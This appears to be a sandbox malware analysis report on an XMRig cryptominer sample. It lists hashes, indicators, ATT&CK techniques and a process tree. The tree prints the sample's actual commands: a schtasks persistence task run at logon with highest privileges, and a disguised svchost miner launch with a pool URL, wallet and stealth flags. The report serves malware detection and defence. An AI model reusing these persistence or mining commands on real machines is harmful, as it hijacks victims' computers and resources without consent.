xmrig | aed297ca559dd8cd5c719950db5d8741ac1115ed7f24ebbac1ca366a1128f595

Analysis

max time kernel
47s
max time network
184s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
26-12-2023 16:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7da815482a6deabaadfca2ebde258c77.exe
Size

2.1MB
MD5

7da815482a6deabaadfca2ebde258c77
SHA1

31ddcc3dcec75d0e74c5e0fb99dfc968cf3d0202
SHA256

aed297ca559dd8cd5c719950db5d8741ac1115ed7f24ebbac1ca366a1128f595
SHA512

1cfd9abfe8abd354ea011bf8ebfeb8968bdae0c8667ef2f5ca218270a21ee3614f1ab8882ce1412c0b45faacbc7cac52b1583b05fec06d74cbef1b5aad40084d
SSDEEP

49152:MlEA+BH8MHhkjb646ATB4X22StMFaTTLGej16bf4cqcj:8GBRSi4Zl4X23tPLGej16b4cq

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 16 IoCs

miner

resource	yara_rule
behavioral1/memory/2052-45-0x0000000140000000-0x000000014074D000-memory.dmp	xmrig
behavioral1/memory/2052-47-0x0000000140000000-0x000000014074D000-memory.dmp	xmrig
behavioral1/memory/2052-48-0x0000000140000000-0x000000014074D000-memory.dmp	xmrig
behavioral1/memory/2052-49-0x0000000140000000-0x000000014074D000-memory.dmp	xmrig
behavioral1/memory/2052-51-0x0000000140000000-0x000000014074D000-memory.dmp	xmrig
behavioral1/memory/2052-52-0x0000000140000000-0x000000014074D000-memory.dmp	xmrig
behavioral1/memory/2052-56-0x0000000140000000-0x000000014074D000-memory.dmp	xmrig
behavioral1/memory/2052-58-0x0000000140000000-0x000000014074D000-memory.dmp	xmrig
behavioral1/memory/2052-61-0x0000000140000000-0x000000014074D000-memory.dmp	xmrig
behavioral1/memory/2052-46-0x0000000140000000-0x000000014074D000-memory.dmp	xmrig
behavioral1/memory/2052-62-0x0000000140000000-0x000000014074D000-memory.dmp	xmrig
behavioral1/memory/2052-63-0x0000000140000000-0x000000014074D000-memory.dmp	xmrig
behavioral1/memory/2052-64-0x0000000140000000-0x000000014074D000-memory.dmp	xmrig
behavioral1/memory/2052-66-0x0000000140000000-0x000000014074D000-memory.dmp	xmrig
behavioral1/memory/2052-65-0x0000000140000000-0x000000014074D000-memory.dmp	xmrig
behavioral1/memory/2052-69-0x0000000140000000-0x000000014074D000-memory.dmp	xmrig

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2300	schtasks.exe
872	schtasks.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2828	7da815482a6deabaadfca2ebde258c77.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2828	7da815482a6deabaadfca2ebde258c77.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2828 wrote to memory of 2604	2828	7da815482a6deabaadfca2ebde258c77.exe	30
PID 2828 wrote to memory of 2604	2828	7da815482a6deabaadfca2ebde258c77.exe	30
PID 2828 wrote to memory of 2604	2828	7da815482a6deabaadfca2ebde258c77.exe	30
PID 2604 wrote to memory of 2300	2604	cmd.exe	31
PID 2604 wrote to memory of 2300	2604	cmd.exe	31
PID 2604 wrote to memory of 2300	2604	cmd.exe	31

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\7da815482a6deabaadfca2ebde258c77.exe
"C:\Users\Admin\AppData\Local\Temp\7da815482a6deabaadfca2ebde258c77.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2828
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2604
- - C:\Windows\system32\schtasks.exe
    schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'
    3⤵
    - Creates scheduled task(s)
    PID:2300
- C:\Users\Admin\AppData\Local\Temp\Services.exe
  "C:\Users\Admin\AppData\Local\Temp\Services.exe"
  2⤵
  PID:1432
- - C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
    3⤵
    PID:2160
- - C:\Windows\System32\svchost.exe
    C:\Windows/System32\svchost.exe -B --coin=monero --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:14433 --user=42z9Fe3LwWgBe2iDmJqvmHDNsAKroadk13jHpA6DaGUiR9x8hi8vrfdUbe2YyAtXBVXZLHcKNhd3BKaCGEF8UVmeQXtazxF.main/kevjazw --pass= --cpu-max-threads-hint=40 --donate-level=5 --unam-idle-wait=5 --unam-idle-cpu=80 --tls --unam-stealth
    3⤵
    PID:2052
- C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
  "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
  2⤵
  PID:2572

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'
1⤵
- Creates scheduled task(s)
PID:872

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit
1⤵
PID:296

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Services.exe

Filesize
15KB

MD5
695deea32802e6d7a30796a3bdb5fb5b

SHA1
2375c3e3b60b802f8c5d871166890bf67828acbd

SHA256
a51540d89bdd978e6bc1647584d6a4b73f4f2fa1c1725022ad1feea464c9667c

SHA512
986234d4214969b70c64fdef85a8f26024d164600f48a7e3f21e967d4a20259ecf4e21a23da283b25c6cce21311c2ce9382b6effc15acab7ebb586c124381b6a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Services.exe

Filesize
1KB

MD5
5a9c82967dabdb8a37b1a5751eb3f35b

SHA1
9192247d23daa5ed18e39ae4248492f0d3fc3f76

SHA256
5b7b605b896acb5624019b52cd85a8293c2788275c3e39ea09b578b1f6dcf97e

SHA512
314f646505f4d28477ce3c35b586642c0e1cbf17e476f148dd929c4bb5ad0016104ef89754d597bae3cff57e3ddefad4fd8922bc06645f5ed2ecdf0700ea57b4

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\WR64.sys

Filesize
14KB

MD5
0c0195c48b6b8582fa6f6373032118da

SHA1
d25340ae8e92a6d29f599fef426a2bc1b5217299

SHA256
11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5

SHA512
ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

Filesize
1KB

MD5
35a62ce50f6b9732a69aeba5c7c0a205

SHA1
fb3f54e834150b6e72b23880a196a65e4292cdb2

SHA256
2f8254bbf5fc19394ebbf4174bf4849ce5787e5bf72f1c8aec73dbbda6db85ff

SHA512
507dd32f1b96d2e947b5e75653ba444cffa81cb4206c77a1d72e8b170a8491530faf4c85bd19972162a35e3c22564e844dc07b69515d00939eb8402a345b8f3e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

Filesize
17KB

MD5
ecbed4fe0de882dfaa9eb74f2fa0f6ab

SHA1
3456f124b147bd95dd097a28f4349bde339f514c

SHA256
cf74c7165a8b7f8d1e02a6550b4b3de9057be0d678b6f8c12a0343801f4cc47f

SHA512
51cac99100f1fad730154724e691dd2b87bd26d5f741895cdc4348c1c496be7f0442330daacceb44a46f4f7e5aa096d422d6065f8dd1d93aaaef3b6e83c11330

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

Filesize
10KB

MD5
65347b9c69434f14ef662c30bdfa6198

SHA1
f7718f58b73c5b0d28283af3052ca5b4c9b77326

SHA256
5f535a57950cff07e3ed538e88d4085ad192854b7b28633d60c13e2ae763f0f6

SHA512
884359c3945b6f376e3a45b05a797ee5a311902c6204328f284ddf53e136f7e9b989afc969e6a0db905e591bfe38e3c7a8be0c7120a590d49eb907a9f1befe1b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

Filesize
16KB

MD5
96562eb28c720a163e73d39a9a8a7324

SHA1
3f77f9bd7afdc25bbf87b9901f480f4652606499

SHA256
ec080b3642d3e59fc835ecd414879aed6cddadbceb9a440eff6c51e0409c4509

SHA512
b232bb82d3fdbd63359185c75084a85752b7b3777e02541498a76be147a6d0409b4f5354409c7553e88a226dc51bff607b1e71e970c1d5872b4e8fdf3e7d78d9

Download Submit
\Users\Admin\AppData\Local\Temp\Services.exe

Filesize
26KB

MD5
b5375254a46535889222db4fd7895cf8

SHA1
84e2a5ecc438ef01de07f6dc68fd24026f9bb65c

SHA256
d6435d349afe38f1d2da470b1bc92b5ab340c6bebd6d23b80e6ffd5b57676e22

SHA512
d7c71340fa0fb98b870b3888c8cad1ac90ee0377086582bae05395a5840609c99f8c28e9978872a7b267594d8673eb42cb0eb03916c74c89fafbf9c01efedf0e

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

Filesize
57KB

MD5
6a8f2c9fe6d158767ead847d912cb0f1

SHA1
8f22fe00a7d66306c9c46e2aacbc7b32d8fcb9ea

SHA256
cbec2a29bf511aec7356fa0d581ac6ee04ede1d909d9742d61141dc9736a21f9

SHA512
75e3c1e8f21a3622beaa4c697c977391ea179887dcb3be92fbfdf5a595f8b86d8f17bc398fda57a74eb593effe081b90463f4764dfc8e4067563bb1899e22f9e

Download Submit
memory/1432-26-0x000007FEF54E0000-0x000007FEF5ECC000-memory.dmp

Filesize
9.9MB

Download
memory/1432-41-0x0000000000A40000-0x0000000000A4E000-memory.dmp

Filesize
56KB

Download
memory/1432-59-0x000007FEF54E0000-0x000007FEF5ECC000-memory.dmp

Filesize
9.9MB

Download
memory/1432-24-0x00000000025F0000-0x0000000002670000-memory.dmp

Filesize
512KB

Download
memory/1432-28-0x00000000025F0000-0x0000000002670000-memory.dmp

Filesize
512KB

Download
memory/1432-18-0x000000013F3C0000-0x000000013F5E6000-memory.dmp

Filesize
2.1MB

Download
memory/1432-20-0x000007FEF54E0000-0x000007FEF5ECC000-memory.dmp

Filesize
9.9MB

Download
memory/2052-43-0x0000000140000000-0x000000014074D000-memory.dmp

Filesize
7.3MB

Download
memory/2052-64-0x0000000140000000-0x000000014074D000-memory.dmp

Filesize
7.3MB

Download
memory/2052-79-0x0000000001FC0000-0x0000000001FE0000-memory.dmp

Filesize
128KB

Download
memory/2052-78-0x00000000003E0000-0x0000000000400000-memory.dmp

Filesize
128KB

Download
memory/2052-77-0x00000000003E0000-0x0000000000400000-memory.dmp

Filesize
128KB

Download
memory/2052-75-0x00000000003E0000-0x0000000000400000-memory.dmp

Filesize
128KB

Download
memory/2052-76-0x0000000001FC0000-0x0000000001FE0000-memory.dmp

Filesize
128KB

Download
memory/2052-73-0x0000000140000000-0x000000014074D000-memory.dmp

Filesize
7.3MB

Download
memory/2052-72-0x0000000140000000-0x000000014074D000-memory.dmp

Filesize
7.3MB

Download
memory/2052-71-0x00000000003E0000-0x0000000000400000-memory.dmp

Filesize
128KB

Download
memory/2052-70-0x0000000140000000-0x000000014074D000-memory.dmp

Filesize
7.3MB

Download
memory/2052-69-0x0000000140000000-0x000000014074D000-memory.dmp

Filesize
7.3MB

Download
memory/2052-65-0x0000000140000000-0x000000014074D000-memory.dmp

Filesize
7.3MB

Download
memory/2052-66-0x0000000140000000-0x000000014074D000-memory.dmp

Filesize
7.3MB

Download
memory/2052-42-0x0000000140000000-0x000000014074D000-memory.dmp

Filesize
7.3MB

Download
memory/2052-62-0x0000000140000000-0x000000014074D000-memory.dmp

Filesize
7.3MB

Download
memory/2052-44-0x0000000140000000-0x000000014074D000-memory.dmp

Filesize
7.3MB

Download
memory/2052-45-0x0000000140000000-0x000000014074D000-memory.dmp

Filesize
7.3MB

Download
memory/2052-47-0x0000000140000000-0x000000014074D000-memory.dmp

Filesize
7.3MB

Download
memory/2052-48-0x0000000140000000-0x000000014074D000-memory.dmp

Filesize
7.3MB

Download
memory/2052-49-0x0000000140000000-0x000000014074D000-memory.dmp

Filesize
7.3MB

Download
memory/2052-50-0x0000000140000000-0x000000014074D000-memory.dmp

Filesize
7.3MB

Download
memory/2052-51-0x0000000140000000-0x000000014074D000-memory.dmp

Filesize
7.3MB

Download
memory/2052-52-0x0000000140000000-0x000000014074D000-memory.dmp

Filesize
7.3MB

Download
memory/2052-56-0x0000000140000000-0x000000014074D000-memory.dmp

Filesize
7.3MB

Download
memory/2052-54-0x000007FFFFFD5000-0x000007FFFFFD6000-memory.dmp

Filesize
4KB

Download
memory/2052-58-0x0000000140000000-0x000000014074D000-memory.dmp

Filesize
7.3MB

Download
memory/2052-61-0x0000000140000000-0x000000014074D000-memory.dmp

Filesize
7.3MB

Download
memory/2052-60-0x00000000000E0000-0x00000000000F4000-memory.dmp

Filesize
80KB

Download
memory/2052-63-0x0000000140000000-0x000000014074D000-memory.dmp

Filesize
7.3MB

Download
memory/2052-53-0x0000000140000000-0x000000014074D000-memory.dmp

Filesize
7.3MB

Download
memory/2052-46-0x0000000140000000-0x000000014074D000-memory.dmp

Filesize
7.3MB

Download
memory/2160-67-0x000007FEF54E0000-0x000007FEF5ECC000-memory.dmp

Filesize
9.9MB

Download
memory/2160-68-0x0000000000720000-0x00000000007A0000-memory.dmp

Filesize
512KB

Download
memory/2160-38-0x000000013F180000-0x000000013F194000-memory.dmp

Filesize
80KB

Download
memory/2160-40-0x0000000000720000-0x00000000007A0000-memory.dmp

Filesize
512KB

Download
memory/2160-39-0x000007FEF54E0000-0x000007FEF5ECC000-memory.dmp

Filesize
9.9MB

Download
memory/2572-25-0x000007FEF54E0000-0x000007FEF5ECC000-memory.dmp

Filesize
9.9MB

Download
memory/2572-19-0x000007FEF54E0000-0x000007FEF5ECC000-memory.dmp

Filesize
9.9MB

Download
memory/2572-22-0x000000001BDD0000-0x000000001BE50000-memory.dmp

Filesize
512KB

Download
memory/2572-21-0x0000000000140000-0x0000000000146000-memory.dmp

Filesize
24KB

Download
memory/2572-29-0x000007FEF54E0000-0x000007FEF5ECC000-memory.dmp

Filesize
9.9MB

Download
memory/2572-14-0x000000013FCA0000-0x000000013FCB4000-memory.dmp

Filesize
80KB

Download
memory/2572-27-0x000000001BDD0000-0x000000001BE50000-memory.dmp

Filesize
512KB

Download
memory/2828-1-0x000007FEF54E0000-0x000007FEF5ECC000-memory.dmp

Filesize
9.9MB

Download
memory/2828-2-0x000000001BED0000-0x000000001C0E2000-memory.dmp

Filesize
2.1MB

Download
memory/2828-0-0x000000013F1E0000-0x000000013F406000-memory.dmp

Filesize
2.1MB

Download
memory/2828-3-0x0000000000860000-0x00000000008E0000-memory.dmp

Filesize
512KB

Download
memory/2828-23-0x000007FEF54E0000-0x000007FEF5ECC000-memory.dmp

Filesize
9.9MB

Download